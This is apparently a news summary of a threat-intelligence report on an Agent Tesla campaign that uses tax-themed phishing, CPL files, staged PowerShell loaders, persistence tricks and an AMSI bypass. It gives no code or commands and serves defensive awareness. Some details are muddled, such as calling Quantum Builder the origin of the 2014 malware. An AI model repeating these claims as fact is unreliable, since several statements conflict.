The Agent Tesla malware has proven to be a significant threat in the world of cybersecurity. This .Net-based Remote Access Trojan (RAT) and data stealer has been in operation since 2014 and has become one of the go-to tools for cybercriminals looking to breach secure organizations.
Recently, researchers at Cyble Research and Intelligence Labs (CRIL) uncovered a new campaign utilizing the Agent Tesla malware. This campaign involves a well-developed process with multiple stages that specifically targets unsuspecting victims using tax-related documents and accompanying control panel files.
The attack begins with a phishing email that tricks the victim into opening a tax document included as an attachment. This tax document contains a CPL file which, when double-clicked, executes PowerShell scripts. These scripts act as a conduit for fetching a PowerShell script from a predefined URL, which then downloads and executes the Agent Tesla malware payload.
Agent Tesla is a highly sophisticated information-stealing tool that is primarily focused on stealing credentials and sensitive personal data from compromised systems. It is also capable of stealing clipboard data, gaining file system access, and exfiltrating data to a Command and Control (C&C) server.
The campaign behind the Agent Tesla malware attack follows a sequence of stages, each serving a specific purpose. The initial infection vector involves a malicious attachment masquerading as a regular executable file. Upon execution, the CPL file triggers PowerShell commands that initiate the download and execution of a PowerShell script. This script conceals its true intent until a new process is initiated, at which point it reveals the underlying malicious code and transforms into additional PowerShell scripts and executables, including a stealthy .NET-based loader.
Persistence is a key aspect of the Agent Tesla malware’s operation. It utilizes both scheduled tasks and the manipulation of startup folders to ensure that it maintains control over compromised systems. Scheduled tasks perpetuate the execution of malicious scripts, while the startup folder acts as a launchpad for malicious payloads during system initialization. To evade detection, the malware employs a binary string variable called AMSISSISISI, which manipulates Windows Defender services and bypasses the Antimalware Scan Interface (AMSI).
The origins of Agent Tesla can be traced back to the Quantum Builder software, which enables cybercriminals to create malicious LNK files. These LNK files play a crucial role in the malware’s attacks, facilitating credential harvesting, payload execution, and initial system access. Agent Tesla gained prominence in the 2020s for exploiting COVID-19 PPE-themed phishing schemes, using emails containing harmful file attachments and malicious Microsoft Office documents.
In terms of its prevalence, Agent Tesla ranked as the 6th most common malware in 2021, affecting 4.1% of business networks. It experienced a 50% decline in global infostealer malware prevalence between 2020 and 2021, second only to Formbook.
As with any report, it is important to note that the information provided is for reference purposes and users bear full responsibility for their reliance on it. The Cyble Research and Intelligence Labs assume no liability for the accuracy or consequences of using this information.
Overall, the Agent Tesla malware continues to pose a significant threat to organizations worldwide. Its evolving tactics and ability to adapt make it a formidable adversary in the realm of cybersecurity. Organizations must stay vigilant and take proactive measures to protect themselves against this dangerous malware.